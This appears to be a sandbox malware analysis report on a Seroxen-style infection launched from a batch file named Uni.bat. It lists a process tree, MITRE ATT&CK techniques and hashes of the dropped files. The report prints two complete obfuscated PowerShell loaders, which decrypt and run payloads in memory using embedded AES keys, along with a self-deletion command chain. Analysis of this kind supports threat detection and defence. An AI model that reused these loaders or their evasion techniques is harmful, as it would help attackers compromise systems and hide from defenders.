"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1360).WaitForExit();[System.Threading.Thread]::Sleep(5000); function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{5c4e2d40-574e-4626-b7fc-fb1db406b3d0}
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{fbfc520c-25ea-4826-8053-64daccd72cd3}
5⤵
PID:5332

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{93d53fe0-737e-4969-aa1b-b22c1cb9e10c}
5⤵
PID:5056

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{63d3beff-95f3-4a6b-a136-613c8b7c9e3f}
5⤵
PID:5328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 476
6⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4192

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{63ecd9b9-f51f-46d8-8c33-b343ae522a50}
5⤵
PID:5564

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{4ae1e1b9-65f9-4fe5-b024-06ec17e466d7}
5⤵
PID:5776

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{b69fd42f-7c0a-44e3-bc77-40f523d98cab}
5⤵
PID:6124

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{4d1351a7-3c42-4deb-aba4-ce8531616c09}
5⤵
PID:5536

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1400

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1580

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1932

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:2320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2428

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2760

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2752

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2932

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1380

C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Deletes itself
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2624

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{949b51b3-d7a3-4ebe-9b7b-1661ca7262d3}
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{24d84389-231a-45b4-86b5-56b3d609a219}
4⤵
PID:4512

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{3d8c1519-320c-40c1-ab91-c606a7ea7231}
4⤵
PID:1064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & exit
4⤵
PID:5476

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious use of SetWindowsHookEx
PID:4900

C:\Windows\system32\PING.EXE
PING localhost -n 8
5⤵
- Runs ping.exe
PID:5624

C:\Windows\system32\taskkill.exe
taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
5⤵
- Kills process with taskkill
PID:2284

C:\Windows\system32\attrib.exe
ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
5⤵
- Views/modifies file attributes
PID:5712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3492

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3852

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4060

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4400

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3684

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1444

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops file in System32 directory
PID:3660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4180

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4192

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:860

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4900

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5856

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:5920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5328 -ip 5328
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5536

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 620 -p 4844 -ip 4844
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6128

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 668 -p 5320 -ip 5320
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6064

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.12df61c7-aae2-4716-90ad-976a15d02c0b.tmp.txt
Filesize
13KB

MD5
e49a91c35a3e93de1bfdf6616c2328ba

SHA1
cabd8e485614f436db312cd874628c968b6c5a09

SHA256
e4ec29d2fff5759311fe18056110c220b2e4f4266ba25c94ea103353c445dc14

SHA512
3620e84c8b558accd88ba9621e1bc2b560401af9d16d3205d15d57964270a263fed4f525a51104ce51b5a2d62ee34d0131a7df9b61083e2e40c350c202c834b1

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.32159128-5bec-486f-b33c-77dc558e48ea.tmp.csv
Filesize
38KB

MD5
111de18d867f6605ec8ef95e8f62a61b

SHA1
fb6478fcf6c9d38a6bedf96f3842a354d4cd894b

SHA256
4590e1ce2e030e31eceba617c9efb3addf1507925916f6f93ae1a4df4b61dc58

SHA512
586419d8007cb897d755b0a3feedda02ea7e633dc4481fa27ba854f3a5ed47fbbdb61c8cb39c00f4938c0fe3c50052b20e7f8a913ae459df79c993d5340224fe

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.aa6054ca-1e0c-498d-b7cc-7255b5d6d142.tmp.csv
Filesize
38KB

MD5
08d26e314205e87435a655698dff0da1

SHA1
ab6d7ea612bbf592f9b17964f5ac33b2ce9257bd

SHA256
309932e023d4b18b6e7be2dc48aa75fbf571a1addab30f43eeed48bbc760c331

SHA512
d3a4334f047a7e8510d0999214598e9c31f8699818e5836e25a20bda524e04f9c9de33a18c5a4e8dafab0877c5a45c0e014a88b42d3f46af3b1bdd952e620e56

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ba1c0a87-68ab-441d-ba9d-f231ee7f9e98.tmp.csv
Filesize
39KB

MD5
880a1752754bba6bea1d8dec861954d0

SHA1
8ad513e12da9b3b4d1d5d99310aa5ca110e7bdfe

SHA256
822342fb07b9e9740915e7be3a57082bbdc6420d057e2474e59c26804f4900cd

SHA512
69a5ea7a7575c4c76a3a470eb45818dd0bbba9d67f115306c5616c5982853b22cb44d759bdfea8e4b12db632eba7a706cbf03791a042331f2e784fc325fdfa44

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.bc3067cb-905f-4386-abab-9cdf5dd44fda.tmp.txt
Filesize
13KB

MD5
86b5f773c960d5f87983d7a2324383c3

SHA1
6ce7f749fd5bf242ae1bd7a579c644f1c8498202

SHA256
03209b3f7b23d01458ea97c4b65858e6c06ab73eba2d287076f9e92a06359f64

SHA512
6f1b9a59ff3f06650bde1eea56b9784845020b41896df5b00d18e5a78d46ab88de3a263334f009f5becf06e97fd5132109a5bf9753d5a84ad18139387a4ba8e4

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.c9bbd7d2-df8b-463d-b9bd-8d546ab18ce1.tmp.txt
Filesize
13KB

MD5
6e34153447e6d77a48e368983221a9c8

SHA1
233e5a7f8bca36c670734813a3d91ed4dcd2cc71

SHA256
6a4964794e07a3a317258cd459ab1662784d5fa7897132952fea29fd4112c543

SHA512
fb47768a32cb1525b6929217fd58349511a8b514a9a81ae64d86c214dd45160a170bb0a301fbc747c728a91f495169d218aa1cd2784300f8f77504c16fa9e7a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5qk3ivon.tpa.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$sxr-cmd.exe
Filesize
324KB

MD5
c5db7b712f280c3ae4f731ad7d5ea171

SHA1
e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

SHA256
f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

SHA512
bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

